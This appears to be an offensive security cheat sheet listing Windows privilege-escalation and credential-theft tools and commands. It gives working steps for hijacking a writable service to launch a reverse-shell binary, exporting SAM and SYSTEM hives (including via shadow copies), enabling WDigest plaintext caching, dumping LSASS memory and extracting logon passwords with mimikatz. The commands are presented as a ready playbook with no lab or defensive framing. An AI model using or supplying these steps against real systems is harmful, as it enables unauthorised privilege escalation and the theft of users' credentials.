Privilege Escalation¶
Privilege Escalation¶
- WinPEAS
- LinPEAS
- windows exploit suggester
- sweet potato, juicy potato, lonely potato, hot potato
- BloodHound
Credential Harvesting¶
- Responder
- Inveigh
- Mimikatz
- ntdsutil
- secretsdump
- Impacket
Service Exploits¶
Insecure Service Permissions¶
-
Find a writable service.
-
accesschk.exe
1. Overwrite the service config.# accesschk.exe # [ # [-d] (only process directories or top level key) # -k (name is a Registry key) # -p [-f] (name is a process name or PID) # (show full process token information) # -c (name is a Windows Service) # -o [-t <object type>] # (name is an object in the Object Manager namespace) # ] # [-r] (show read access only) # [-w] (show write access only) # [<username>] # { <file (default)> | <directory> | <registry key> | <process> | <service> | <object> } accesschk.exe /accepteula -uwcqv user * -
sc
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
-
-
Start ther service.
-
sc
sc start daclsvc -
net
net start daclsvc
-
Potato Attacks¶
Print Spoofer¶
PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 | itm4n
Pass the Hash¶
Hash Source¶
SAM (registry)¶
only local account
-
Export
-
reg
cmd> reg save HKLM\SAM .\sam.reg cmd> reg save HKLM\SYSTEM .\system.reg -
vssadmin
cmd> vssadmin create shadow cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .\sam.reg cmd> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .\system.reg
-
-
Show
sh> samdump2 system sam
LSASS (memory)¶
only logon account
-
Prerequisite
cmd> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f -
Export
cmd> procdump.exe -accepteula -ma lsass.exe lsass.dmp -
Show
-
From dump file
mimikatz> sekurlsa::minidump lsass.dmp mimikatz> sekurlsa::logonPasswords -
Live
mimikatz> privilege::debug mimikatz> sekurlsa::logonpasswords
-